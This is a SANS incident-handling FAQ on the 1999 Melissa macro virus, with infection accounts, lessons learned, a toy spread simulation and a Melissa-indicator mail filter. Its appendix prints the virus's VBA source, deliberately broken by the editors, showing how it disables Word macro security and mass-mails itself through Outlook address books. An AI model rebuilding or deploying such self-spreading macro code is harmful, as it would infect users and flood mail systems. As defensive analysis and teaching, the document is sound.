
Intrusion Detection FAQ: What was the Melissa virus and what can we learn from it?

(This was originally released as: SANS Flash Report - Melissa virus, March 28, 1999; last updated April 22, 1999; Editor: Stephen Northcutt)

Table of Contents:
  1. What Melissa teaches us
    1. Infection Speed
    2. Collateral Damage
    3. Need for Defense in Depth
  2. One site's Melissa Infestation
    1. User's Story
    2. Security Manager Leads Cleanup
  3. Conclusion and Lessons Learned
  4. Appendix: Melissa Source Code

The Melissa macro virus was first observed Friday, March 26, 1999 and quickly became the most well known and widely spread macro virus infection to date. This flash report was originally released to supplement available CIRT and FIRST team resources. It has been updated to focus on the lessons learned from the event and to serve as a planning tool for the future.

Many sites were aware of Melissa on Friday, others over the weekend and of course, still others found Monday morning, March 28, to be a challenging day. By late Friday, an excellent description of the virus, including how to identify and contain it at the host level had been developed and published by the Computer Emergency Response Team at Carnegie Mellon. This document is available at: http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html

Major anti-virus vendors have already released descriptions and anti-viral signatures. URLs for NAI and Symantec are listed below:

http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp

http://www.symantec.com/avcenter/venc/data/mailissa.html

SANS applauds the work done by these organizations as well as other CIRT and FIRST teams whose rapid response helped keep this from becoming an even larger problem.

The focus of this document is on the lessons learned and the bigger picture from the Melissa macro virus. We will discuss the implications raised by the speed of infection, the impact of an infection from a user's and from a security manager's point of view, and finally some lessons learned based on the experiences of users who replied to the original Flash report.

1. What Melissa teaches us

The Internet was not truly prepared for Melissa; the number of affected sites is a warning that we had best learn from. In this section we will consider some of the implications of this virus. In the conclusion we will also consider lessons learned, but those are based on the responses of readers to the first Flash report.

1.1 Infection Speed

According to NAI's web site, the virus was first discovered on an "alt.sex" newsgroup and spread rapidly. This serves as a warning of how fast a virus with an unknown signature can spread. A modified, non-operative copy of the source code is included as an appendix to this document. If you search for the string "For y = 1 To DasMapName.AddressLists.Count", you can see how the virus replicated so rapidly: it went through Microsoft Outlook address books and sent itself to the first 50 entries in each book. The most widely published sections of the code are marked with comments that begin with ***.

Of course, all the copies in the world are to no avail if they don't have anywhere to go. Though address books contain some errors, on the whole they point to active accounts, which proved to be fruitful targets.
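The fan-out described in the two paragraphs above (every infected host mails the first 50 entries of each address book, and those entries are mostly live accounts) can be put into a small model. The following is an added example written for this FAQ; it is not Melissa code and not anything SANS or NAI published. It sends nothing and only counts hosts on a constructed graph. The host numbering, the two address-book layouts (random books versus heavily overlapping "neighbour" books) and the open rate are assumptions made here to show why fan-out alone does not determine speed: overlap between address books matters just as much.

```python
"""Toy model of address-book fan-out.  Constructed illustration, not Melissa
code: hosts are integers 0..N-1, each with an address book of FANOUT other
hosts.  A newly infected host 'mails' every entry in its book once; an
uninfected recipient opens the attachment with probability open_rate and
becomes infected in the next generation.  Nothing is sent anywhere."""
import random


def random_books(n, fanout, seed=1):
    """Each host knows FANOUT distinct other hosts chosen at random (assumed layout)."""
    rng = random.Random(seed)
    books = []
    for host in range(n):
        picks = rng.sample(range(n), fanout + 1)  # one spare in case we drew ourselves
        if host in picks:
            picks.remove(host)
        else:
            picks.pop()
        books.append(picks)
    return books


def neighbour_books(n, fanout):
    """Each host knows the next FANOUT hosts, so adjacent books overlap almost entirely."""
    return [[(host + k) % n for k in range(1, fanout + 1)] for host in range(n)]


def simulate(books, open_rate=1.0, max_generations=200, seed=1):
    """Return the cumulative count of infected hosts after each generation.

    Generation 0 is patient zero (host 0).  Each generation only the hosts
    infected in the previous generation send mail, exactly as a macro that
    runs once when the document is opened would.  Stops when a generation
    infects nobody new, when everyone is infected, or at max_generations.
    """
    rng = random.Random(seed)
    n = len(books)
    infected = {0}
    newly = {0}
    timeline = [1]
    for _ in range(max_generations):
        next_wave = set()
        for sender in newly:
            for recipient in books[sender]:
                if recipient in infected or recipient in next_wave:
                    continue  # already infected: a second copy changes nothing
                if rng.random() < open_rate:
                    next_wave.add(recipient)
        if not next_wave:
            break
        infected |= next_wave
        newly = next_wave
        timeline.append(len(infected))
        if len(infected) == n:
            break
    return timeline


def generations_to_reach(timeline, fraction, n):
    """First generation at which at least `fraction` of n hosts are infected, or None."""
    target = fraction * n
    for gen, count in enumerate(timeline):
        if count >= target:
            return gen
    return None


if __name__ == "__main__":
    N, FANOUT = 2000, 50
    layouts = (("random books", random_books(N, FANOUT)),
               ("overlapping neighbour books", neighbour_books(N, FANOUT)))
    for label, books in layouts:
        t = simulate(books)
        print(f"{label}: {len(t) - 1} generations to exhaust, per-generation totals {t[:6]} ...")
        print(f"  90% of hosts infected at generation {generations_to_reach(t, 0.9, N)}")
```

With everyone opening the attachment, the random layout saturates 2000 hosts in a handful of generations, while the overlapping layout adds only 50 new hosts per generation and needs 40 of them, because almost every address a sender has is already on a colleague's list. Lowering open_rate below 1.0 slows both but does not change the shape: the model is a way to reason about how much a user-awareness campaign (fewer opens) or address-book overlap buys you, not a prediction of real spread.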

In the March 02 webcast (http://www.sans.org/webarchives.htm), Stephen Northcutt discussed another MS Word macro virus, M97.Marker.a. This is an information-gathering virus: Marker sends the Microsoft Office registration information of infected systems outside the organization via FTP. Northcutt's point was that this would allow a prospective attacker to develop an infection map and, by knowing who sends what to whom, to mount future rapid, focused attacks. Melissa wasn't targeted, but it certainly was rapid.

As a community we need to learn the lessons that Marker and Melissa teach. Neither virus was destructive, and the two are quite different; their primary similarity is that both are macro viruses. However, they both serve as a warning shot, a heads-up for security professionals to reconsider the risks of the macro virus threat vector. With a few adjustments to the source code, either virus could have caused significant damage to organizations.

1.2 Collateral damage

The Melissa virus did no damage in the sense of deleting or stealing files; only sites with desktop systems running Microsoft's Outlook email client were directly affected. However, even systems that did not spread the virus directly by email still had their Microsoft Word documents infected and continued to pass on the virus. Moreover, the cost of dealing with Melissa is in the millions of dollars. How did a virus that does no explicit damage wreak so much havoc? The financial losses are mostly in the area of lost productivity:
  • Some sites have reported that they shut down electronic mail entirely for multiple days.
  • Many sites lost email connectivity for several hours while cleaning the virus from their servers.
  • System administrator and help desk resources were tied up fighting the virus for periods ranging from three to five days at most affected organizations.
One network engineer, who worked at one of the first sites to report the problem on Friday March 26, said "I knew something was wrong before I knew what was wrong. I could feel the network going slower and slower. As I looked into it, I found the exchange mail servers were melting down." Again, one of the lessons of Melissa is that a macro virus can hit us all very fast and very hard.

1.3 Need for defense in depth

Though Melissa was primarily spread by e-mail, passing an infected floppy disk worked just as well to move the virus to a new system, possibly even a new organization. This means that a single line of defense such as a content checking firewall might be easily circumvented. Sites discovered that the more defensive layers they had deployed, the more options they had. These defensive layers included virus checking at firewalls, servers and desktops, as well as email filters, quick hacks, and special cleaning programs.

Several creative, short-term "band-aid" solutions were developed to slow the spread of the virus. These quick hacks are reminiscent of the guy who saved his home from burning during the Malibu wildfires by standing on his roof spraying a garden hose. We can call him crazy, but his house stands unburned today. The primary electronic mail filter that was made available did its work by searching for Melissa's signature subject line, "Important Message From ". This worked and certainly helped get Melissa under control, though it also helped that Melissa variants with different subject lines were not released early in the attack. Another band-aid that some organizations tried was to create fifty or more blank lines at the beginning of Outlook address books. It is easy to criticize band-aids as unsophisticated, but when you have to deal with a cut, a band-aid sure can be handy!

Several sites have reported they were unable to apply either the sendmail filter or firewall-based scanners because they didn't have the latest version of the software. Monday morning, March 28, was too late to update software: the Internet feeds of the antivirus companies were saturated by clients all over the Internet trying to download updates to their virus signatures.

Virus scanning at the firewall, on servers and on the desktop systems as well as physical entry points for magnetic media are recommended for sites that want to avoid the kind of punch Melissa exhibited.

2. One site's experience

One of the hidden costs of Melissa is the impact on people. Here we present two stories from an infected site, from two points of view: a user who received and opened the attachment, and the security manager who led the cleanup at the site.

2.1 A User's Story

"As I composed the last email of the day, a message hit the Inbox of my Microsoft Outlook email application. The subject line read: "Important Message From [Jane Doe]". I viewed the message, and the body read "Here is that document you asked for... don't show anyone else ;-)"

Attached was a Microsoft Word document titled "list1.doc".

"Although I hadn't requested any documents from [Jane Doe], I was expecting a couple of them from other people. It wasn't inconceivable to think that she had become involved, even though I didn't know who she was. I double-clicked on the Word document. A pop-up window appeared, warning me that a macro was contained in the document, and that macros can potentially be dangerous. I knew that... :-) So, I shut down the Word application, and checked the document with several of the virus detection packages that I had. Everything appeared clean."

"Since this was from someone in my organization, apparently a trusted source, I went ahead and opened the document with the macros enabled. In less than a second, a duplicate of the message had hit my mailbox, this time with my name attached. I hit the power-off button on my computer, but it was late. The payload had been delivered. My name was now attached to a file containing pornographic web sites, and an apparent username and password for each site. Moments later, duplicate messages from others who had made the same mistake began to appear."

"At this point I knew we, as an organization, were in trouble. This virus (or worm) was snowballing fast, too fast. I immediately called our information systems security manager, only to find that his phone was already busy. I left a voicemail detailing my appraisal of the situation, and my fear that this incident could get serious... very quickly. What I didn't know was that I was too late, it was already *very* serious."

This user now realizes that opening a file from a user he didn't know, with an attachment pertaining to something he didn't know about, and then allowing the macros to execute was a serious error. Hopefully we can all learn from it!

2.2 A security manager's story

"As soon as we discovered the virus late Friday afternoon, we disconnected our servers (all SMTP relays and Exchange servers at our Internet connection) from the network until we could contain the infection. This happened at approximately 1800 hours Friday.

"System administrators for both corporate and departmental Exchange servers worked through Friday night and well into Saturday. Many returned Saturday and again on Sunday to complete the isolation and cleanup. They cleaned up the Exchange servers with updated anti-viral signatures as soon as they were available. The corporate servers and one departmental server were ready to come back on-line late Sunday. We left IMS (Internet Mail Service) disabled until we could contain (filter) email at the SMTP server.

"Our version of sendmail is one removed from the latest and filter updates provided by the author would not work on our version. We resorted to getting the word out for ALL users to update the AV signatures and refrain from sending Word docs until any with macros had been identified as coming from trusted sources. The administrator for the SMTP relay host downloaded a trial version of InterScan VirusWall from TrendMicro. For more info, see: http://www.antivirus.com/products/isvw/index.htm

"The clean-up picture would have been much bleaker if we hadn't had so many things in our favor:
  • System administrators were still at work when the problem started (approximately 1640 on Friday).
  • Most of the users were gone for the weekend (and didn't compound the problem by manually sending additional copies of the infected document).
  • All of the system administrators involved in the clean up had been trained in incident handling.
  • The person who needed to make key decisions was trained in incident response and had already begun carrying a cell phone.
  • Base commanders recognized the expertise that was in use and supported the Incident Handling team by not directing what needed to be done (at least so far)."
Note: The incident handling process used by this site is based on the six stages of incident handling: preparation, identification, containment, eradication, recovery, and follow-up. The URLs at the beginning of this document can help you with identification and eradication. Your organization may need to consider email server downtime in order to achieve containment. You may also want to consider setting up non-email communication channels for your organization. If you do not know how to build a telephone call tree, look for a "soccer mom"; they know how to spread important information very efficiently. In this way, if you do suffer an email meltdown, you can still get important information, such as where to acquire the latest anti-virus software, to your users.

3. Conclusion and Lessons Learned

Because Melissa exploited one of the most valuable benefits of the net -- the ability to share documents -- to propagate and to multiply itself, it affected more people and spread faster than earlier viruses. The silver lining in this cloud is that a relatively benign virus like Melissa was an effective way of gaining user and organizational awareness. Just about every organization on the Internet learned something about incident handling and about how dependent on Internet services they are. The organizations that learn from Melissa will be stronger and better prepared to deal with whatever comes next. After reviewing the comments from users and debriefing organizations, here are some of the primary lessons learned from the experience:
  1. Keep your defensive software up to date. Users have reported being unable to install the filter from sendmail.com because they were running older versions of sendmail. Users of TrendMicro's VirusWall who were not running the latest version have reported the same problem. Virtually everyone on the Internet was caught with out-of-date anti-virus signature tables. For sites with round-the-clock staffing, it may be advantageous to consider downloading new anti-virus signature tables on Sunday evening as a standard practice.
  2. The danger of macros. Many of the users who responded to the initial flash report have commented on the risk of macros. It will take a long time before benign applications of macros make up for the productivity lost to Melissa. If your site has the ability to scan content at the firewall, you may want to consider stopping files that contain macros, unless these are important to the conduct of your business.
  3. Established incident handling procedures. Many sites were caught flat-footed by Melissa. The success of this attack may stimulate others to try to top Melissa and release more harmful programs. Organizations should learn from their response to Melissa and begin to develop formal incident handling procedures. These should include training for user awareness of what to look for, whom to call, and what to say when they call about a security threat.
We want to hear your experiences and lessons learned. Please send your tips, tricks, techniques, experiences and lessons learned to info@sans.org with Melissa in the subject line. If we share, we can learn from this and be in a better position the next time an event like this occurs.

Appendix: Melissa Source Code

NOTE: Several errors have been introduced into this copy of the code as a safety measure so that it will not run as is. Also, some sections have been removed. We hope this will not overly impact your opportunity to understand how the software works, but we could not be responsible for furthering a live version of Melissa. Text comments have been inserted at the "famous" locations, preceded by three asterisks "***".

*** Begins by checking security, the environment, and whether already infected

Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
"Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
"Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by
Kwyjibo" Then
If UngaDasOutlook = "Inlook" Then
DasMapName.Logon "profile", "password"
For y = 1 To DasMapName.AddressLists.Count
Set BreakOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakOffASlice.Recipients.Add Peep
x++
If x < 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakOffASlice.Subject = "Important Message From " &Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for
... don't show anyone else ;-)"

*** Here is the classic subject line "Important Message From" This could change of course in future versions ***

BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapName.Logoff
End If
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by
Kwyjibo"
End If
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo END
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(END, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document")
= False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points,
plus triple-word-score, plus fifty points for using all my letters.
Game's over. I'm outta here."
End Sub

*** The lines above are some of the most published information about this virus. Though you can set intrusion detection and other string matching security tools to look for keywords like "Kwyjibo", simple modifications of the code could change these. ***
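The two filtering ideas this document mentions, the subject-line mail filter of section 1.3 and the keyword matching described just above, can be combined into one layered check so that a variant has to change everything at once to slip through. The following is an added example written for this FAQ; it is not SANS code and contains nothing from the listing above beyond the three strings it matches on. The message-building helper, the sample messages and the attachment bytes are constructed here for the example; the .doc/.dot extension test is a heuristic assumed for illustration, and the code does not parse Word files or inspect macros.

```python
"""Layered mail-filter heuristics for the Melissa indicators given in this
document.  Added example: the messages below are constructed samples and the
'attachment' is an arbitrary byte string carrying the marker words only."""
import email
from email import policy
from email.message import EmailMessage

# Indicators taken from the document text: the subject prefix, the body
# phrase, and strings that appear in the macro source listing.
SUBJECT_PREFIX = "Important Message From "
BODY_PHRASE = "don't show anyone else"
SOURCE_MARKERS = (b"Kwyjibo", b"DasMapiName", b"BreakUmOffASlice")


def classify(raw):
    """Return the list of indicator names that fired for one RFC 822 message.

    An empty list means nothing matched; anything else is worth quarantining
    for a person to look at.  The checks are independent on purpose: a copy
    with a new subject line is still caught by the body, attachment-type and
    attachment-content checks, which is the defence-in-depth point made in
    section 1.3.
    """
    msg = email.message_from_bytes(raw, policy=policy.default)
    hits = []
    if msg.get("Subject", "").startswith(SUBJECT_PREFIX):
        hits.append("subject")
    body = msg.get_body(preferencelist=("plain",))
    if body is not None and BODY_PHRASE in body.get_content():
        hits.append("body")
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if name.endswith((".doc", ".dot")):      # assumed heuristic: Word file types
            hits.append("doc-attachment")
        payload = part.get_payload(decode=True) or b""
        if any(marker in payload for marker in SOURCE_MARKERS):
            hits.append("source-marker")
    return hits


def build_message(subject, text, attachment_name=None, attachment_bytes=b""):
    """Construct a sample message (helper for this example, not a real mail flow)."""
    m = EmailMessage()
    m["From"] = "sender@example.test"
    m["To"] = "user@example.test"
    m["Subject"] = subject
    m.set_content(text)
    if attachment_name:
        m.add_attachment(attachment_bytes, maintype="application",
                         subtype="msword", filename=attachment_name)
    return m.as_bytes()


# Constructed samples.  The attachment bytes are placeholders that merely
# contain the marker strings; they are not a document and not macro code.
SAMPLE_ORIGINAL = build_message(
    "Important Message From Jane Doe",
    "Here is that document you asked for... don't show anyone else ;-)",
    "list1.doc", b"<placeholder bytes> Kwyjibo <placeholder bytes>")
SAMPLE_VARIANT = build_message(
    "Re: that file",
    "Attached as discussed.",
    "notes.doc", b"<placeholder bytes> BreakUmOffASlice <placeholder bytes>")
SAMPLE_CLEAN = build_message("Lunch?", "See you at noon.")


if __name__ == "__main__":
    for label, raw in (("original", SAMPLE_ORIGINAL),
                       ("variant", SAMPLE_VARIANT),
                       ("clean", SAMPLE_CLEAN)):
        print(f"{label}: {classify(raw) or 'no indicators'}")
```

Each layer here is trivially evadable on its own, exactly as the text warns: change the subject, rephrase the body, rename the variable. The value of stacking them is that the author of a variant must change all of them, and the attachment-type check in particular survives any rewording, which is why the conclusion suggests stopping macro-bearing files at the firewall when the business can tolerate it.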